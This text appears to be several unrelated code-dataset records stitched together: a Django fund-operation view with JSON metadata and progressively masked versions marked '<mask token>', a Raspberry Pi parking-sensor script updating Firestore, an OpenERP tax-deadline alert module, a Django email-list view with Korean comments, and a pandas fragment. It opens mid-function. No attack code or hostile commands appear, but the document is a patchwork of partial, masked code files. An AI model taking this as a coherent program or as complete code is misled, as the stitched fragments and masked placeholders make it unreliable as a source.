initial=initial
)
else:
data['lines'] = FundOperationFormSet(
instance=self.object,
initial=initial
)
data['lines'].extra = len(initial) if initial else 1
return data
def form_valid(self, form):
context = self.get_context_data()
lines = context['lines']
with transaction.atomic():
form.instance.create_user = self.request.user
self.object = form.save()
if lines.is_valid():
lines.instance = self.object
lines.save()
else:
return self.form_invalid(form, lines)
return super().form_valid(form)
def form_invalid(self, form, lines=None):
return self.render_to_response(self.get_context_data(form=form, lines=lines))
def get_success_url(self):
return reverse_lazy('fund_operation:fund_operation_update', kwargs={'pk': self.object.pk})
|
normal
|
{
"blob_id": "3c2fb3d09edab92da08ac8850f650a2fa22fad92",
"index": 8806,
"step-1": "<mask token>\n\n\nclass FundOperationCreateView(CreateView):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n return super().form_valid(form)\n <mask token>\n\n\nclass FundOperationUpdateView(UpdateView):\n model = FundOperation\n template_name = 'forms/fund_operation/update.html'\n form_class = FundOperationForm\n success_url = None\n\n def _get_initial_data(self):\n if self.object.lines.all():\n return None\n initial = [{'body': 'प्रदेश सरकार'}, {'body': 'संघीय सरकार'}, {\n 'body': 'स्थानीय तह'}, {'body':\n 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी'}, {'body':\n 'अन्तरराष्ट्रिय गैर सरकारी संस्था'}, {'body': 'गैरसरकारी संस्था'}]\n return initial\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n initial = self._get_initial_data()\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST,\n instance=self.object, initial=initial)\n else:\n data['lines'] = FundOperationFormSet(instance=self.object,\n initial=initial)\n data['lines'].extra = len(initial) if initial else 1\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n else:\n return self.form_invalid(form, lines)\n return super().form_valid(form)\n\n def form_invalid(self, form, lines=None):\n return self.render_to_response(self.get_context_data(form=form,\n lines=lines))\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_update', kwargs=\n {'pk': self.object.pk})\n",
"step-2": "<mask token>\n\n\nclass FundOperationCreateView(CreateView):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST)\n else:\n data['lines'] = FundOperationFormSet()\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n return super().form_valid(form)\n <mask token>\n\n\nclass FundOperationUpdateView(UpdateView):\n model = FundOperation\n template_name = 'forms/fund_operation/update.html'\n form_class = FundOperationForm\n success_url = None\n\n def _get_initial_data(self):\n if self.object.lines.all():\n return None\n initial = [{'body': 'प्रदेश सरकार'}, {'body': 'संघीय सरकार'}, {\n 'body': 'स्थानीय तह'}, {'body':\n 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी'}, {'body':\n 'अन्तरराष्ट्रिय गैर सरकारी संस्था'}, {'body': 'गैरसरकारी संस्था'}]\n return initial\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n initial = self._get_initial_data()\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST,\n instance=self.object, initial=initial)\n else:\n data['lines'] = FundOperationFormSet(instance=self.object,\n initial=initial)\n data['lines'].extra = len(initial) if initial else 1\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n else:\n return self.form_invalid(form, lines)\n return super().form_valid(form)\n\n def form_invalid(self, form, lines=None):\n return self.render_to_response(self.get_context_data(form=form,\n lines=lines))\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_update', kwargs=\n {'pk': self.object.pk})\n",
"step-3": "<mask token>\n\n\nclass FundOperationCreateView(CreateView):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST)\n else:\n data['lines'] = FundOperationFormSet()\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_create')\n\n\nclass FundOperationUpdateView(UpdateView):\n model = FundOperation\n template_name = 'forms/fund_operation/update.html'\n form_class = FundOperationForm\n success_url = None\n\n def _get_initial_data(self):\n if self.object.lines.all():\n return None\n initial = [{'body': 'प्रदेश सरकार'}, {'body': 'संघीय सरकार'}, {\n 'body': 'स्थानीय तह'}, {'body':\n 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी'}, {'body':\n 'अन्तरराष्ट्रिय गैर सरकारी संस्था'}, {'body': 'गैरसरकारी संस्था'}]\n return initial\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n initial = self._get_initial_data()\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST,\n instance=self.object, initial=initial)\n else:\n data['lines'] = FundOperationFormSet(instance=self.object,\n initial=initial)\n data['lines'].extra = len(initial) if initial else 1\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n else:\n return self.form_invalid(form, lines)\n return super().form_valid(form)\n\n def form_invalid(self, form, lines=None):\n return self.render_to_response(self.get_context_data(form=form,\n lines=lines))\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_update', kwargs=\n {'pk': self.object.pk})\n",
"step-4": "<mask token>\n\n\nclass FundOperationCreateView(CreateView):\n model = FundOperation\n template_name = 'forms/fund_operation/create.html'\n form_class = FundOperationForm\n success_url = None\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST)\n else:\n data['lines'] = FundOperationFormSet()\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_create')\n\n\nclass FundOperationUpdateView(UpdateView):\n model = FundOperation\n template_name = 'forms/fund_operation/update.html'\n form_class = FundOperationForm\n success_url = None\n\n def _get_initial_data(self):\n if self.object.lines.all():\n return None\n initial = [{'body': 'प्रदेश सरकार'}, {'body': 'संघीय सरकार'}, {\n 'body': 'स्थानीय तह'}, {'body':\n 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी'}, {'body':\n 'अन्तरराष्ट्रिय गैर सरकारी संस्था'}, {'body': 'गैरसरकारी संस्था'}]\n return initial\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n initial = self._get_initial_data()\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST,\n instance=self.object, initial=initial)\n else:\n data['lines'] = FundOperationFormSet(instance=self.object,\n initial=initial)\n data['lines'].extra = len(initial) if initial else 1\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n else:\n return self.form_invalid(form, lines)\n return super().form_valid(form)\n\n def form_invalid(self, form, lines=None):\n return self.render_to_response(self.get_context_data(form=form,\n lines=lines))\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_update', kwargs=\n {'pk': self.object.pk})\n",
"step-5": "from django.db import transaction\nfrom django.forms import inlineformset_factory\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views.generic import CreateView, UpdateView\nfrom forms.models.fund_operation import FundOperation\nfrom forms.forms.fund_operation_forms import FundOperationForm, FundOperationLineForm, FundOperationFormSet\n\n\nclass FundOperationCreateView(CreateView):\n model = FundOperation\n template_name = \"forms/fund_operation/create.html\"\n form_class = FundOperationForm\n success_url = None\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST)\n else:\n data['lines'] = FundOperationFormSet()\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_create')\n\n\nclass FundOperationUpdateView(UpdateView):\n model =FundOperation\n template_name = \"forms/fund_operation/update.html\"\n form_class = FundOperationForm\n success_url = None\n\n def _get_initial_data(self):\n if self.object.lines.all():\n return None\n\n initial = [\n {\n 'body': 'प्रदेश सरकार',\n },\n {\n 'body': 'संघीय सरकार',\n },\n {\n 'body': 'स्थानीय तह',\n },\n {\n 'body': 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी',\n },\n {\n 'body': 'अन्तरराष्ट्रिय गैर सरकारी संस्था',\n },\n {\n 'body': 'गैरसरकारी संस्था',\n },\n ]\n return initial\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n\n initial = self._get_initial_data()\n if self.request.POST:\n data['lines'] = FundOperationFormSet(\n self.request.POST,\n instance=self.object,\n initial=initial\n )\n else:\n data['lines'] = FundOperationFormSet(\n instance=self.object,\n initial=initial\n )\n data['lines'].extra = len(initial) if initial else 1\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n else:\n return self.form_invalid(form, lines)\n\n return super().form_valid(form)\n\n def form_invalid(self, form, lines=None):\n return self.render_to_response(self.get_context_data(form=form, lines=lines))\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_update', kwargs={'pk': self.object.pk})\n",
"step-ids": [
9,
10,
11,
12,
14
]
}
|
[
9,
10,
11,
12,
14
] |
import os
import RPi.GPIO as GPIO
from google.cloud import firestore
import time
############Explicit Credential environment
path="/home/pi/Desktop/Parking.json"
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] =path
#GPIO starts
s1=2
s2=21
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(s1,GPIO.IN)
GPIO.setup(s2,GPIO.IN)
#firestore initialization
db = firestore.Client()
doc_ref_s1 = db.collection(u'sensors').document(u'sensor1')
doc_ref_s2 = db.collection(u'sensors').document(u'sensor2')
#here starts main
data1=0
data2=0
counter=0
while 1:
if(GPIO.input(s1)==False): #car found in slot 1
data1=1
counter+=1
else: data1=0
print("Received from 1: %s" % data1)
###Now starts for sensor 2
if(GPIO.input(s2)==False): #car found in slot 2
data2=1
counter-=1
else: data2=0
print("Received from 2: %s" % data2)
if(counter>8):
counter=8
elif(counter<0):
counter=0
print("Counter= %s" % counter)
doc_ref_s1.update({
u'priority': counter
})
|
normal
|
{
"blob_id": "e1cc4e17bffcbbae3e7785e4c55acde167a8a50a",
"index": 6482,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\n<mask token>\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-3": "<mask token>\npath = '/home/pi/Desktop/Parking.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path\ns1 = 2\ns2 = 21\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\ndata1 = 0\ndata2 = 0\ncounter = 0\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-4": "import os\nimport RPi.GPIO as GPIO\nfrom google.cloud import firestore\nimport time\npath = '/home/pi/Desktop/Parking.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path\ns1 = 2\ns2 = 21\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\ndata1 = 0\ndata2 = 0\ncounter = 0\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-5": "import os\nimport RPi.GPIO as GPIO\nfrom google.cloud import firestore\nimport time \n\n############Explicit Credential environment\npath=\"/home/pi/Desktop/Parking.json\"\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] =path\n\n#GPIO starts\ns1=2\ns2=21\nGPIO.setmode(GPIO.BCM) \nGPIO.setwarnings(False)\nGPIO.setup(s1,GPIO.IN)\nGPIO.setup(s2,GPIO.IN)\n\n\n#firestore initialization\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\t\t\t\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\n#here starts main\ndata1=0\ndata2=0\ncounter=0\nwhile 1:\n\t\n\tif(GPIO.input(s1)==False): #car found in slot 1\n\t\tdata1=1\n\t\tcounter+=1\n\telse: data1=0\n \n\tprint(\"Received from 1: %s\" % data1)\n\t###Now starts for sensor 2\t\n\tif(GPIO.input(s2)==False): #car found in slot 2\n\t\tdata2=1\n\t\tcounter-=1\n\telse: data2=0\n\tprint(\"Received from 2: %s\" % data2)\n\tif(counter>8):\n\t\tcounter=8\n\telif(counter<0):\n\t\tcounter=0\n\tprint(\"Counter= %s\" % counter)\n\tdoc_ref_s1.update({\n\t\tu'priority': counter\n\t\t})\n\t\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2011 Eficent (<http://www.eficent.com/>)
# Jordi Ballester Alomar <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import tools
from osv import fields, osv
from tools.translate import _
from datetime import datetime, timedelta
date_format = '%Y-%m-%d'
class tax(osv.Model):
_inherit = 'sgr.tax'
def send_alerts(self, cr, uid, context=None):
self.send_alerts_with_upcoming_days(cr, uid, 2, context=context)
def send_alerts_with_upcoming_days(self, cr, uid, upcoming_days, context=None):
now = datetime.now()
now_plus_upcoming_days = now + timedelta(days=upcoming_days)
tax_to_paid_ids = self.search(cr, uid, [('state','=','to_pay')], context=context)
tax_due_date_soon = []
taxs_due = []
overdue_taxs = []
for tax in self.browse(cr, uid, tax_to_paid_ids, context=context):
if not tax.approval_date:
continue
approval_date = datetime.strptime(tax.approval_date, date_format)
if approval_date <= now:
overdue_taxs.append(tax)
elif now < approval_date and approval_date <= now_plus_upcoming_days:
taxs_due.append(tax)
for tax in taxs_due:
self.message_post(cr, uid, [tax.id], body="Tax payment deadline soon", subtype="sgr_alerts.mt_tax_due_date_soon", context=context)
for tax in overdue_taxs:
self.message_post(cr, uid, [tax.id], body="Tax payment deadline expired", subtype="sgr_alerts.mt_tax_due_date", context=context)
#all_tax_ids = self.search(cr, uid, [], context=context)
#for tax in self.browse(cr, uid, all_tax_ids, context=context):
# print 'tax: ' + str(tax.id)
# self.message_post(cr, uid, [tax.id], body="Due Date Soon", subtype="sgr_alerts.mt_tax_due_date_soon", context=context)
return True
tax()
|
normal
|
{
"blob_id": "1ddec426e4ad50f1d0e8a57ed841fbdf8c51b00f",
"index": 9871,
"step-1": "<mask token>\n\n\nclass tax(osv.Model):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass tax(osv.Model):\n _inherit = 'sgr.tax'\n\n def send_alerts(self, cr, uid, context=None):\n self.send_alerts_with_upcoming_days(cr, uid, 2, context=context)\n\n def send_alerts_with_upcoming_days(self, cr, uid, upcoming_days,\n context=None):\n now = datetime.now()\n now_plus_upcoming_days = now + timedelta(days=upcoming_days)\n tax_to_paid_ids = self.search(cr, uid, [('state', '=', 'to_pay')],\n context=context)\n tax_due_date_soon = []\n taxs_due = []\n overdue_taxs = []\n for tax in self.browse(cr, uid, tax_to_paid_ids, context=context):\n if not tax.approval_date:\n continue\n approval_date = datetime.strptime(tax.approval_date, date_format)\n if approval_date <= now:\n overdue_taxs.append(tax)\n elif now < approval_date and approval_date <= now_plus_upcoming_days:\n taxs_due.append(tax)\n for tax in taxs_due:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline soon', subtype=\n 'sgr_alerts.mt_tax_due_date_soon', context=context)\n for tax in overdue_taxs:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline expired', subtype=\n 'sgr_alerts.mt_tax_due_date', context=context)\n return True\n\n\ntax()\n",
"step-3": "<mask token>\ndate_format = '%Y-%m-%d'\n\n\nclass tax(osv.Model):\n _inherit = 'sgr.tax'\n\n def send_alerts(self, cr, uid, context=None):\n self.send_alerts_with_upcoming_days(cr, uid, 2, context=context)\n\n def send_alerts_with_upcoming_days(self, cr, uid, upcoming_days,\n context=None):\n now = datetime.now()\n now_plus_upcoming_days = now + timedelta(days=upcoming_days)\n tax_to_paid_ids = self.search(cr, uid, [('state', '=', 'to_pay')],\n context=context)\n tax_due_date_soon = []\n taxs_due = []\n overdue_taxs = []\n for tax in self.browse(cr, uid, tax_to_paid_ids, context=context):\n if not tax.approval_date:\n continue\n approval_date = datetime.strptime(tax.approval_date, date_format)\n if approval_date <= now:\n overdue_taxs.append(tax)\n elif now < approval_date and approval_date <= now_plus_upcoming_days:\n taxs_due.append(tax)\n for tax in taxs_due:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline soon', subtype=\n 'sgr_alerts.mt_tax_due_date_soon', context=context)\n for tax in overdue_taxs:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline expired', subtype=\n 'sgr_alerts.mt_tax_due_date', context=context)\n return True\n\n\ntax()\n",
"step-4": "import tools\nfrom osv import fields, osv\nfrom tools.translate import _\nfrom datetime import datetime, timedelta\ndate_format = '%Y-%m-%d'\n\n\nclass tax(osv.Model):\n _inherit = 'sgr.tax'\n\n def send_alerts(self, cr, uid, context=None):\n self.send_alerts_with_upcoming_days(cr, uid, 2, context=context)\n\n def send_alerts_with_upcoming_days(self, cr, uid, upcoming_days,\n context=None):\n now = datetime.now()\n now_plus_upcoming_days = now + timedelta(days=upcoming_days)\n tax_to_paid_ids = self.search(cr, uid, [('state', '=', 'to_pay')],\n context=context)\n tax_due_date_soon = []\n taxs_due = []\n overdue_taxs = []\n for tax in self.browse(cr, uid, tax_to_paid_ids, context=context):\n if not tax.approval_date:\n continue\n approval_date = datetime.strptime(tax.approval_date, date_format)\n if approval_date <= now:\n overdue_taxs.append(tax)\n elif now < approval_date and approval_date <= now_plus_upcoming_days:\n taxs_due.append(tax)\n for tax in taxs_due:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline soon', subtype=\n 'sgr_alerts.mt_tax_due_date_soon', context=context)\n for tax in overdue_taxs:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline expired', subtype=\n 'sgr_alerts.mt_tax_due_date', context=context)\n return True\n\n\ntax()\n",
"step-5": "# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Copyright (C) 2011 Eficent (<http://www.eficent.com/>)\n# Jordi Ballester Alomar <[email protected]>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\n\nimport tools\nfrom osv import fields, osv\nfrom tools.translate import _\n\nfrom datetime import datetime, timedelta\n\ndate_format = '%Y-%m-%d'\n\nclass tax(osv.Model):\n _inherit = 'sgr.tax'\n \n def send_alerts(self, cr, uid, context=None):\n self.send_alerts_with_upcoming_days(cr, uid, 2, context=context)\n \n def send_alerts_with_upcoming_days(self, cr, uid, upcoming_days, context=None):\n now = datetime.now()\n now_plus_upcoming_days = now + timedelta(days=upcoming_days)\n \n tax_to_paid_ids = self.search(cr, uid, [('state','=','to_pay')], context=context)\n tax_due_date_soon = []\n \n taxs_due = []\n overdue_taxs = []\n \n for tax in self.browse(cr, uid, tax_to_paid_ids, context=context):\n if not tax.approval_date:\n continue\n \n approval_date = datetime.strptime(tax.approval_date, date_format)\n \n if approval_date <= now:\n overdue_taxs.append(tax)\n elif now < approval_date and approval_date <= now_plus_upcoming_days:\n taxs_due.append(tax)\n \n for tax in taxs_due:\n self.message_post(cr, uid, [tax.id], body=\"Tax payment deadline soon\", subtype=\"sgr_alerts.mt_tax_due_date_soon\", context=context)\n \n for tax in overdue_taxs:\n self.message_post(cr, uid, [tax.id], body=\"Tax payment deadline expired\", subtype=\"sgr_alerts.mt_tax_due_date\", context=context)\n \n #all_tax_ids = self.search(cr, uid, [], context=context)\n #for tax in self.browse(cr, uid, all_tax_ids, context=context):\n # print 'tax: ' + str(tax.id)\n # self.message_post(cr, uid, [tax.id], body=\"Due Date Soon\", subtype=\"sgr_alerts.mt_tax_due_date_soon\", context=context)\n \n \n return True\n \n \n \ntax()\n\n\n\n",
"step-ids": [
1,
5,
6,
7,
8
]
}
|
[
1,
5,
6,
7,
8
] |
from django.shortcuts import render
# from emaillist.models import Emaillist
from emaillist.models import Emaillist
from django.http import HttpResponseRedirect
# Create your views here.
# def index(request):
# emaillist_list = Emaillist.objects.all().order_by('-id') # db에서 objects 전체를 불러와서 변수에 저장
# data = {'emaillist_list':emaillist_list} # 딕션너리 형식으로 데이터에 저장
# return render(request, 'emaillist/index.html', data) # render 라는 임시변수에 url(request)에서 불러온 값으로 emillist/index.html 형식으로 data값을 출력한다.
def test_index(request):
print("test_index 함수 실행하자 ")
emaillist_list = Emaillist.objects.all().order_by('-id') # db에서 objects 전체를 불러와서 변수에 저장
data = {'emaillist_list':emaillist_list} # 딕션너리 형식으로 데이터에 저장
return render(request, 'emaillist/test_index.html', data)
# def form(request):
# return render(request, 'emaillist/form.html')
def test_form(request):
print("test 함수 실행하자 ")
return render(request, 'emaillist/test_form.html')
def add(request):
emaillist = Emaillist()
emaillist.first_name = request.POST['fn'] # 웹에 first_name부분에 작성한 값 (index.html에서 input으로 받은 password) 을 가져와서 데이터베이스(emailist)의 first_name column에 저장
emaillist.last_name = request.POST['ln'] # 웹에 last_name부분에 작성한 값 (index.html에서 input으로 받은 password) 을 가져와서 데이터베이스(emailist)의 last_name column에 저장
emaillist.email = request.POST['email'] # 웹에 email부분에 작성한 값 (index.html에서 input으로 받은 password) 을 가져와서 데이터베이스(emailist)의 email column에 저장
emaillist.save() # 저장된 내역을 DB에 저장
return HttpResponseRedirect('/emaillist') # 저장완료되면 기존 리스트 페이지로 이동
#
# def add2(request):
# emaillist2 = Emaillist2()
# emaillist2.first_name = request.POST['fn']
# emaillist2.last_name = request.POST['ln']
# emaillist2.email = request.POST['email']
#
# emaillist2.save()
#
# return HttpResponseRedirect('/emaillist')
|
normal
|
{
"blob_id": "5220ad793788927e94caf7d6a42df11292851c67",
"index": 2734,
"step-1": "<mask token>\n\n\ndef test_form(request):\n print('test 함수 실행하자 ')\n return render(request, 'emaillist/test_form.html')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_form(request):\n print('test 함수 실행하자 ')\n return render(request, 'emaillist/test_form.html')\n\n\ndef add(request):\n emaillist = Emaillist()\n emaillist.first_name = request.POST['fn']\n emaillist.last_name = request.POST['ln']\n emaillist.email = request.POST['email']\n emaillist.save()\n return HttpResponseRedirect('/emaillist')\n",
"step-3": "<mask token>\n\n\ndef test_index(request):\n print('test_index 함수 실행하자 ')\n emaillist_list = Emaillist.objects.all().order_by('-id')\n data = {'emaillist_list': emaillist_list}\n return render(request, 'emaillist/test_index.html', data)\n\n\ndef test_form(request):\n print('test 함수 실행하자 ')\n return render(request, 'emaillist/test_form.html')\n\n\ndef add(request):\n emaillist = Emaillist()\n emaillist.first_name = request.POST['fn']\n emaillist.last_name = request.POST['ln']\n emaillist.email = request.POST['email']\n emaillist.save()\n return HttpResponseRedirect('/emaillist')\n",
"step-4": "from django.shortcuts import render\nfrom emaillist.models import Emaillist\nfrom django.http import HttpResponseRedirect\n\n\ndef test_index(request):\n print('test_index 함수 실행하자 ')\n emaillist_list = Emaillist.objects.all().order_by('-id')\n data = {'emaillist_list': emaillist_list}\n return render(request, 'emaillist/test_index.html', data)\n\n\ndef test_form(request):\n print('test 함수 실행하자 ')\n return render(request, 'emaillist/test_form.html')\n\n\ndef add(request):\n emaillist = Emaillist()\n emaillist.first_name = request.POST['fn']\n emaillist.last_name = request.POST['ln']\n emaillist.email = request.POST['email']\n emaillist.save()\n return HttpResponseRedirect('/emaillist')\n",
"step-5": "from django.shortcuts import render\n# from emaillist.models import Emaillist\nfrom emaillist.models import Emaillist\nfrom django.http import HttpResponseRedirect\n\n# Create your views here.\n\n# def index(request):\n# emaillist_list = Emaillist.objects.all().order_by('-id') # db에서 objects 전체를 불러와서 변수에 저장\n# data = {'emaillist_list':emaillist_list} # 딕션너리 형식으로 데이터에 저장\n# return render(request, 'emaillist/index.html', data) # render 라는 임시변수에 url(request)에서 불러온 값으로 emillist/index.html 형식으로 data값을 출력한다.\n\n\ndef test_index(request):\n print(\"test_index 함수 실행하자 \")\n emaillist_list = Emaillist.objects.all().order_by('-id') # db에서 objects 전체를 불러와서 변수에 저장\n data = {'emaillist_list':emaillist_list} # 딕션너리 형식으로 데이터에 저장\n return render(request, 'emaillist/test_index.html', data)\n\n# def form(request):\n# return render(request, 'emaillist/form.html')\n\ndef test_form(request):\n print(\"test 함수 실행하자 \")\n return render(request, 'emaillist/test_form.html')\n\n\ndef add(request):\n emaillist = Emaillist()\n emaillist.first_name = request.POST['fn'] # 웹에 first_name부분에 작성한 값 (index.html에서 input으로 받은 password) 을 가져와서 데이터베이스(emailist)의 first_name column에 저장\n emaillist.last_name = request.POST['ln'] # 웹에 last_name부분에 작성한 값 (index.html에서 input으로 받은 password) 을 가져와서 데이터베이스(emailist)의 last_name column에 저장\n emaillist.email = request.POST['email'] # 웹에 email부분에 작성한 값 (index.html에서 input으로 받은 password) 을 가져와서 데이터베이스(emailist)의 email column에 저장\n\n emaillist.save() # 저장된 내역을 DB에 저장\n\n return HttpResponseRedirect('/emaillist') # 저장완료되면 기존 리스트 페이지로 이동\n#\n# def add2(request):\n# emaillist2 = Emaillist2()\n# emaillist2.first_name = request.POST['fn']\n# emaillist2.last_name = request.POST['ln']\n# emaillist2.email = request.POST['email']\n#\n# emaillist2.save()\n#\n# return HttpResponseRedirect('/emaillist')",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import pandas as pd
df = pd.read_csv("search.csv")
df0 = df[df['re_0']<df['re_1']]
df1 = df[df['re_0']>df['re_1']].ix[:, ['re_1', 'im_1', 're_0', 'im_0']]
df1.columns = ['re_0', 'im_0', 're_1', 'im_1']
df = pd.concat([df0, df1]).sort_values(by=["re_0"])
eps = pow(10.0, -4.0)
